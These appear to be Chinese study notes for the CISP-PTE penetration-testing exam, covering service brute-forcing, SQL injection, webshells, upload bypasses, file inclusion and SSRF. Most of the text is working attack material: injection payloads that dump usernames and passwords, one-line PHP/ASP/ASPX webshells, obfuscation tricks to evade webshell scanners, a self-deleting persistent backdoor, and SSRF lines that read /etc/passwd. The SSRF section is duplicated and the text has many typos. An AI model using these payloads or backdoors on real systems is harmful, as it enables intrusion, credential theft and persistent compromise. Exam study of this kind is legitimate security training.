CISP-PTE证书
弱口令与爆破破解
服务弱口令爆破
可以针对那些服务进行暴力破解
windows:
3389:远程桌面
445 :SMB服务
1433:sqlserver服务
....
Linux:
22 :ssh远程shell
21 :ftp
3306:mysql数据库
1521:orcale数据库
....
服务暴力破解软件
·Medusa的特点
-稳定性好
-速度控制得当
-基于线程
-支持模块少于Hydraa(不支持RDP,可扩展)
-WEB-Form支持存在缺陷
·Hydra的缺点(相对)
-稳定性差,程序时常崩溃
-速度控制不好,容易触发服务屏蔽或锁死机制
-每主机新建进程,每服务新建实例大量目标破解时性能差
medusa -M smbnt -h 192.168.1.100 -u Eternal -P pass.lst -e ns -F -v 3
-M:表示你要破解的类型(协议)
-h:目标机器地址
-u:用户名。
-U:指定账号列表
-e:尝试空密码
-F:破解成功后立即停止破解
-V:显示破解过程
-P:指定密码字典列表
-p:指定单个密码
kail自带密码文件所在出:
SQL注入
数据库基本字段
数据库基本语句
| 数据库基本字段 | |
|---|---|
| version 数据库的版本 | databaseO 当前数据库的名字 |
| basedir 数据库的路径 | length() 字符串的长度 |
| substr() 截取字符 | userO 当前登陆用户 |
| ascio 返回ascii值 | sleep(4) 睡眠指定的秒数 |
| concato 接字符串 | group_concatO 查询结果放到同一行 |
| substr0 需要截取的字符串 1.需要截取的字符串 2.从第几位开始截取(从1开始计数) | limit 0,1 1.第几个 2.显示长度 |
Mysql中的注释符
万能密码
所谓万能密码就是 绕过登录验证 直接进入 管理员后台的密码 ,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。
select name,passwd from users where name='$name'and passwd='$passwd
当 $name 输入为 1'or 1 = 1# 时,语句为:
select name,passwd from users where name= ' 1'or 1 = 1# ' and passwd='123456'
导致查寻结果恒为真,登陆成功
维度一 基于注入点值的属性
整型: select uname,password from users where uid=$id
整型举例:select *from table where id = 3
字符型举例: select uname,password from users where uid='$id'
字符型:select *from table where name='admin'
维度二 基于注入点的位置
注入点出现的位置,并不是只存在于GET提交的URLorPOST提交的正文中,还可能存在其他地方。总之在BP抓的传递数据至服务器数据包上的任何位置都有可能存在注入点。按位置细分如下:
维度三 基于注入的程度和顺序
一阶注入是指注入语句的对WEB产生了直接影响;二阶注入是指提交的注入语句无法直接对WEB应用程序产生影响,需要通过其他的辅助间接才导致注入产生。称为二阶注入。
维度四 基于从服务器返回的响应(注入手法)
当构造不同的payload,如果WEB应用存在注入。那么返回的数据包中可能会包含数据库信息,也可能不包含。总之输入payload,总会导致返回数据包的产生差别。这些差别体现在,返回数据包的内容,长度,返回时间差上的差别。可以通过这些差别来直接或者间接的判断数据库内容。
有回显 无回显
联合查询注入 布尔盲注
报错注入 延时注入
堆叠注入
有回显-联合查询
联合查询关键字union,union操作符可以合并两条或多条select语句的查询结果。格式就是在第一条查询后面注入一个union运算符来拼接任意查询,来提取数据,使用union之前我们必须要满足两个条件:
1.两个查询返回的列数必须相同
2.必须有显位 (交互位)
手工注入过程
判断当前查询语句的列数
获取数据库中信息:判断列数
1' order by 1--
1' order by n--
1' or 1=1 order by n--
备注:判断列数可以使用“二分法”
查询数据库基本信息
获取数据库中信息:用户、版本、数据库名,操作系统等
| 获取数据库中信息:用户、版本、数据库名,操作系统等 | |
|---|---|
| userO返回当前使用数据库的用户x | |
| version0返回当前数据库版本x | |
| userO返回当前使用数据库的用户version0返回当前数据库版本Qdatabase0返回当前使用的数据库名 | |
| @@_versioncompile_os返回当前数据库使用的操作系统 |
查询数据库中的数据
获取数据库中信息:查看数据库表
首先我们需要先了解informationschema库
表名存放在 information_schema 数据库下 tables表 table_name列
字段名存在 information_schema 数据库下 columns表 column_name列
获取表名:
admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database()#
获取字段名
admin' union select 1,group_concat(column_name) from information_schema.columns where table_name ="user" and
table_schema=database()#
获取数据名:
admin' union select 1,group_concat(username,"_",password) from users#
有回显—报错注入
报错注入是利用mysql在报错信息中引出查询我们需要的数据
报错注入设计的部分函数
函数形式 :extratvalue(XML_document,XPath_string);
第一个参数:XMLdocument是String格式,为XML文档对象的名称
第二个参数:XPathstring(Xpath格式的字符串)
作用:从目标XML中返回包含所查询值的字符串
注入语句为:extractvalue(1,concat(0x7e,(select查询语句),0x7e))
函数形式:extractvalue(1,concat(0x7e,(select 查询语句),0x7e))
admin' and extractvalue(1,concat(0x7e,(select version()),0x7e)) #
获取表名
admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database() ),0x7e)) #
获取字段名:
admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name ='users' and table_schema=database()),0x7e))#
获取数据名:
admin' and extractvalue(1,concat(0x7e,(select group_concat(username,"_",password) from users),0x7e)) #
函数的开式为:updateXML(XMLdocument,XPath_string,neW_value);
第一个参数:XML_document是String格式,为XML文档对象的名称
第二个参数:XPath_string(Xpath格式的字符串)
第三个参数:new_value,String格式,替换查找到的符合条件的数据
注入语句为:updatexml(1,concat(Ox7e,(SELECT查询语句),Ox7e),1)
判断版本
admin' and updatexml(1,concat(0x7e,(select version()),0x7e),1)#
获取表名:
admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
获取字段名:
admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),0x7e),1)#
获取数据名:
admin' and updatexml(1,concat(0x7e,(select group_concat(username,'_',password)from users),0x7e),1)#
主键值重复报错
mysql官方说在执行groupby语句的时候,groupby语句后面的字段会被运算两次!
第一次计算:groupby后面的字段值拿到虚拟表中去对比,在对比之前肯定要知道groupby后面字段的值。
第二次计算:当groupby后面的字段的值在虚拟表中还不存在,那么就需要把它插入到虚拟表中,这里在插入时会进行第二次运算。
select count(*),(concat(floor(rand(0)*2),0x26,(select version0)))x frominformation_schema.tables group by x;
函数的形式为:
select count(*),(concat(floor(rand(0)*2),0x26,(select·version()))x from information_schema.tablesgroup by x;
注入语句为:
admin'and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x frominformation_schema.tablesgroup by x)a)
有回显-堆叠注入
堆查询注入是在MySQL中,分号(;) 表示一条sql语句结束。在()结束后在拼接一个sql语句的情况。就是堆叠注入。
无回显注入----布尔盲注
布尔型盲注是根据返回的状态的注入。当页面得不到可用的反馈信息但不同语句输入进去后有不同显示。也是代表有一些TRUE or FALSE的状态。
substr() 截取字符
length() 统计长度
ascil() 字符转换为Ascii码
1.获得数据库名
?id=1' and (lengrh(database()))>n %23 #获得数据库长度
?id=1' and ascii(substr(database(),1 ,1))>Y %23 #获取名字
2.获取表名
?id=1' and (select count(table_name)from information_schema.tables where table_schema=database())>n %23 #获取表数
?id=1' and length(select table_name from information_schema.tables where table_schema=database() limit 0,1))=n %23 #获取第一个表名的字符长度
?id=1'and ascii((substr((select table_name from information_schema.tables where table_schema=database() limit0,1),y,1)))=z #获取表名
3、获取列名和数据获取列名 (先获取列名个数,再获取列名长度,最后获取列名)
?id=1' and (ascii(substr((select column_name frominformation_schema.columns where table_name='users'andtable_schema=database() limit (0,1),1,1)))>100#
?id=1' and (select count(column_name) frominformation_schema.columns where table_name='users')=11#
判断users表有多少个表列名
?id=1' and length((select column_name frominformation_schema.columns where table_name='users' limit0,1))=1# 判断第一个表列名有多少个字符串
?id=1'and ascii(substr((select column_name frominformation_schema.columns where table_name='users' 1imit0,1),1,1))>105# 判断第一个表列名第一个字符的ascii
4.结合BURP
无回显—延时盲注
延时注入,是一种基于时间差异的注入。此时不管页面返回的信息内容和差异,而是关注返回的时间差。通过加入?的时间函数,然后通过WEB页面返回的时间差来判断注入语句否正确。
sleep(seconds)
使用说明:睡眠时间为seconds参数给的的秒数,然后返回e,若sleep()被中断返回1。
if(expr1, expr2, expr3)如果exp1参数的判断条件为真那么返回expr2的参数,如果为假返回expr3 参数
select * from user2 where username = ''admin' and (if((length(database()))=4,sleep(4),nul1))
select * from user2 where username ='admin'and (if((substr(database(),1,1))='t',sleep(4),nul1))
1、数据库名
?id=1':and·(if((length(database()))=4, sleep(4),null))#数据库长度
?id=1' and (if((ascii((substr((database()),y,1)))=xx
2.获取表名
?id=1'and (if((select count(table_name) frominformation_schema.tables where table_schema=database())=4 ,sleep(4),null)) #获取表的数量
?id=1'and (if((select table_name from information_schema.tableswhere table_schema=database() 1imit 0,1))=4,sleep(4),null))#获取第一个表名的字符长度
?id=1'and (if((ascii((substr((select table_name frominformation_schema.tables where table_schema=database() limitx,1),y,1)))=xx 获取表名
(括号中的0,1代表第一个表,1,1代表第二个表以此类推)
3、获取列名和数据获取列名 (先获取列名个数,再获取列名长度,最后获取列名)
4.获取数据
insert注入
insert article1value('2BE24719-FA61-65F1-4C55-A6587FE676A4','aaa','bbb','LZQ')
*/'LZQ')#
二次注入 可以先把过滤内容送到数据库 在执行语句
aaa',(select/**/database()),/* 获取库名
insert article1value('2BE24719-FA61-65F1-4C55-A6587FE676A4','aaa',(select/**/database()),/*','bbb',' */'LZQ')#') ①
insert article1value('2BE24719-FA61-65F1-4C55-A6587FE676A4','aaa',(select/**/database()),'LZQ') ②
aaa'(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),/* #获取表名
aaa'(select/**/grout_concat(coloum_name)/**/from/**/information_schema.columns/**/where/**/table_name='users1'/**/and/**/table_schema=databases()),/* #获取字段名
AAA',(select/**/group_concat(password, '_',username)/**/from/**/useris1),/*
获取数据
XX型注入
SQLmap
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用sQL注入漏洞,针对各种不同类型数据库获取数据库服务器的权限。
| SQLmap | |
|---|---|
| -u | #指定要探测的目标URL |
| –current-db | #查看当前数据库 |
| -D | #指定数据库 |
| –tables | #查看表名 |
| -T | #指定表 |
| –columns | #查看字段名 |
| -C | #指定字段 |
| –dump | #获取数据 |
| -r | #加载数据包 |
| –level 1-5 | #探测等级 默认等级1-getpost |
任意文件上传
文件上传漏洞
文件上传漏洞是指攻击者上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务端命令的能力。该漏洞在业务应用系统中出现概率较高,究其原因是业务场景中上传附件、头像等功能非常常见,若在系统设计中忽略了相关的安全检查,则容易导致文件上传漏洞。
WellShell
WebShell就是以网页文件形式(asp\php\jsp)存在的一种命令执行环境,客户端通过远程连接,利用webShell连接到服务器,并可对服务器进行操作。一定能够解析
!
WellShell之PHP一句话木马
ASP:
<%eval request("x")%>
ASP.NET:
<%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>
PHP:
<?php @eval($_POST["x"]);?>
eval() 是一个语言构造器而不是一个函数,不能被可变函数调用。
assert() 可以被可变函数调用,例如诸多的回调函数,这样就灵活很多。
文件上传漏洞如何查找及判断
黑盒 目录敏感文件扫描--上传地址会员中心-上传图像网站后台"
白盒··代码分析
WellShell基础免杀
目标是关键字(正则匹配)查杀就使用非敏感函数
弱动态扫描的使用类和类析构的方式绕过
不直接使用$_GET和$_POST来获取数据,还有科学数123456e123456(php7可用)
异或、hex传递明文字符串
偏门姿势,如文件包含、反序列化、新建进程执行等
长亭、百度等在线查杀可考虑php混淆加密来绕过
遇到waf就去找preg_replace、preg_replace_callback两个大哥
利用str_replace函数变形
<?php
$a=str_replace("abc","","aabcsabcabcsabceabcrt")
$a($_REQUEST["cmd"]);
?>
利用bace64_decode()函数变形
<?php
$a=base64_becode("YXNzZXJ0")
$a($_REQUEST['cmd']);
?>
利用 . 操作进行变形
<?php
$a="as"."se";
$b="r"."t";
$c=$a.$b;
$c($_REQUEST['cmd']);
| 字符串变形 |
|---|
| ucwords() //函数把字符串中每个单词的首字符转换为大写。 |
| ucfirst()//函数把字符串中的首字符转换为大写。 |
| trim()//函数从字符串的两端删除空白字符和其他预定义字符。 |
| substr_replace()//函数把字符串的一部分替换为另一个字符串 |
| substr()//函数返回字符串的一部分。 |
| strtr()//函数转换字符串中特定的字符。 |
| strtoupper()//函数把字符串转换为大写。 |
| strtolower()//函数把字符串转换为小写。 |
PHP后门隐藏技巧
不死马会删除自身,以进程的形式循环创建隐蔽的后门。
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(_FILE_); //删除自身
while(1){
file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>');
sleep(10); //间隔时间
}
?>
文件上传过程
客户端JaxaScript检测
检测方法
JavaS-cript检测即前端检测,通常是当前上传页面含有专门检测上传文件的JavaScript代码。判断方式:上传页面是否有弹窗。查看页面源代码。
绕过方法
第一种是用Burp代理,修改为正常文件的后缀名后再页面上传、然后再通过Burp拦截修改后缀名即可绕过。
第二种是直接对页面HTML代码进行修改,将调用的相关的JS检测代码去掉即可绕过。
1).修改JS代码,取消限制文件类型的事件
2).利用burpsuite,修改一句话木马成为图片,上传后,利用burpsutie将图片后缀名重新修改成为原本后缀名后发送。
服务端MIME检测
检测方法
MIME类型消息内容类型检测,即服务端对请求报文CoNten t-Type字段头的检查。
绕过方法
在上传WebShell的时修改请求头Conten t-Type头的值为白名单限定的MIME类型即可绕过。比如白名单为图片限制。Content-Type头就必须为image/jpeg或image/png或image/gif。
MIME类型检测,即服务端对请求报文中content-type字段的检查绕过方法:
通过burpsuite修改MIME字段,从而进行PHP文件的传输。
常见MIME类型
MME多用途互联网邮件扩展类型,是设定某种扩展名的文件用一种应用程序来打开的方式类型。
常见MIME类型有
| .jpg | image/jpeg |
|---|---|
| .gif | image/gif |
| .png | image/png |
| .txt | text/plain |
| .word | application/msword |
| .html | text/html.*(二进制流,位置文件类型)application/octet-stream |
文件内容进行检测—文件幻术
1)文件幻数文件头检测,主要是检测文件内容开头处的文件幻数,每个图片类型的前几个字节代表的意义是不同的
绕过方法:
图片马:找一张图片,以及一句话木马,做组合(CMD中copy命令)比如:copy图片.jpg/b(已二进制形式打开)+ma.php/a(以ascii形式打开)组合后的名字伪造文件幻数:将burpsuite抓包后,改包,文件内容前加入GIF89A(GIF格式的文件幻数)
服务端黑名单检测
黑名单检测基于检测后缀名,来确保文件不会被上传。
绕过方法:1)特殊可解析后缀比如.php可以转成为.php2·php3
2)大小写转换
3)空格双写:pphphp
5 htaaccess文件绕过
将JPG文件以PHP文件进行解析匹配关键字进行解析
服务端黑名单检测—htaccess文件
服务端白名单检测
匹配关键字进行解析
白名单检测
基于检测后缀名,来确保文件不会被上传。绕过方法:
1)路径可控(00截断)条件:要求PHP版本小雨5.3
GET方式:/4.php%00/4.gpg
00相当于截断,将4.gPg截断,并且将源文件重命名成4.php
POST方式:/4.php0x00/4.gpg
00相当于截断,将4.gpg截断,并且将源文件重命名成4.php
0x00要在数据包中先来进行填充比如写一个+号,/4.php+然后将填充字符修改成00截断
文件包含
文件保含漏洞特点
file:// 利用条件:无
用于访问本地文件系统,通常用来读取本地文件的且不受a11o_url_fopen与allow_url_include的影响
php://filter 利用条件:无
用于读取php源代码时会用到。也就是说将一个PHP文件通过base64编码读出
data:text/plan
利用:PHP代码执行PHP代码php版本>=php5.2; allow_url_fopen= 0n allow_url_include =0n可以执行任意代码。
姿势1:?file=data://text/plain,<?php执行内容?>
姿势2:?file=data://text/plain;base64,编码后的php代码
php://input
利用条件:alow_url_include=on。对alow_url_fopen不做要求。
用法:?file=php://input 数据利用POST传过去。可以造成任意代码执行
zip:// 利用条件php版本大于等于php5.3.0
zip://压缩文件绝对路径#[压缩文件内的子文件名]
例如脚本文件为shell.php,打包成shell.zip,然后再改名为shell.jpg index.php
?file=zip://1.jpg %23 1.php或者绝对路径index.php
?file=zip://D:/1.jpg %23 1.php
phar://利用条件php版本大于等于php5.3.0
phar//压缩文件绝对/相对路径 /压缩文件内的子文件名/例如脚本文件为shell.php 打包成shell.zip,然后在改名为shell.jpg
index.php?file=phar://shell.jpg/shell.php或绝对路径
index.php"file=phar://D:/shell.jpg/shell.php
远程文件包含
服务器通过PHP的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严格,从而可以去包含一个恶意文件,攻击者就可以远程构造一个特定的恶意文件达到攻击目的。利用条件:allow_url_fopen与allow_url_include同时开启。缺一不可。
XSS漏洞
http协议特点
1.支持客户/服务器模式
2.简单快速
·客户向服务器请求服务时,只需传送请求方法和路径
·由于HTTP协议简单,使得HTTP服务器的程序规模小,因此通信速度快
3.灵活
4.无状态--无法维护两个事物之间的联系·无状态是指协议对于事务处理没有记忆能力
cookie
Cookie是通过客户端保持状态的解决方案。从定义上来说,Cookie就是由服务器发给客户端的特殊信息,而这些信息以文本文件的方式存放在客户端,然后客户端每次向服务器发送请求的时候都会带上这些特殊的信息。
session
通常会把Session翻译成会话,因此可以把客户端浏览器与服务器之间一系列交互的动作称为一个Session。其次Session指的是服务器端为客户端所开辟的存储空间,在其中保存的信息就是用于保持状态。
cookie和session区别
Cookie保存在客户端;Session保存在服务器端。
Cookie保存ASCll;Session可以存任意数据类型。
Cookie可设置为长时间保持;Session一般失效时间较短。
Cookie保存的数据不能超过4K;Session可存储数据远高于Cookie。
cookie和session的区别
刚提到HTTP协议是无状态,这意味着浏览器并不知道是张三还是李四在Cyk7r和服务端打交道。这个时候就需要有一个机制来告诉服务端,本次操作用户是否登录,是哪个用户在执行的操作,那这套机制的实现就需要Cookie 和 Session的配合。
Cookies·和·Session机制解决HTTP无状态的问题
Cookies非常容易被盗用,一旦盗用,绕过服务端认证
Session缺乏有效的验证机制
CSRF漏洞 ----跨站请求伪造(客户端请求伪造)
SSRF漏洞(服务端请求伪造)
SSRF的原理
SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。例如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务点的请求伪造。SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器。
SSRF的利用
主要利用一下几个协议:
HTTP://
file://
dict://
gopher://
SSRF利用存在多种形式以及不同的场景,针对不同场景可以使用不同的利用和绕过方式。以curl为例,可以使用dict协议操作Redis、file协议读文件、gopher协议反弹Shell等功能。
curl是常用的命令行工具,用来请求Web服务器。它的名字就是客户端(client)的URL工具的意思。使用file协议curl·-v·file:///etc/passwd
使用ftp协议curl-v"ftp://127.0.0.1:端口/info"
使用dict协议curl-v"dict://127.0.0.1:端口/info"
使用gopher协议curl-v"gopher://127.0.0.1:端口/_info"
#-v参数输出通信的整个过程,用于调试。我们便可以利用-v参数进行读取文件
利用访问第三方网站
利用探测目标开放的端口、版本号
利用获取敏感文件
我们目前可以利用SSRF漏洞来做什么事情?以及怎么去发现这个SSRF漏洞?
1.用来端口探测(服务探测)(ping/nmap探测)[本机也可以探测]
2.可以利用SSRF漏洞来读取敏感文件
怎么发现这个漏洞?
1.看传参(参数名:url/file/link等等,参数值:完整的地址。http://url/path)---黑盒
2.代码审计----白盒
页文本内容,加载指定地址的图片等,利用的是服务点的请求伪造。SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器。
SSRF的利用
主要利用一下几个协议:
HTTP://
file://
dict://
gopher://
SSRF利用存在多种形式以及不同的场景,针对不同场景可以使用不同的利用和绕过方式。以curl为例,可以使用dict协议操作Redis、file协议读文件、gopher协议反弹Shell等功能。
curl是常用的命令行工具,用来请求Web服务器。它的名字就是客户端(client)的URL工具的意思。使用file协议curl·-v·file:///etc/passwd
使用ftp协议curl-v"ftp://127.0.0.1:端口/info"
使用dict协议curl-v"dict://127.0.0.1:端口/info"
使用gopher协议curl-v"gopher://127.0.0.1:端口/_info"
#-v参数输出通信的整个过程,用于调试。我们便可以利用-v参数进行读取文件
利用访问第三方网站
利用探测目标开放的端口、版本号
利用获取敏感文件
我们目前可以利用SSRF漏洞来做什么事情?以及怎么去发现这个SSRF漏洞?
1.用来端口探测(服务探测)(ping/nmap探测)[本机也可以探测]
2.可以利用SSRF漏洞来读取敏感文件
怎么发现这个漏洞?
1.看传参(参数名:url/file/link等等,参数值:完整的地址。http://url/path)---黑盒
2.代码审计----白盒
8333
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
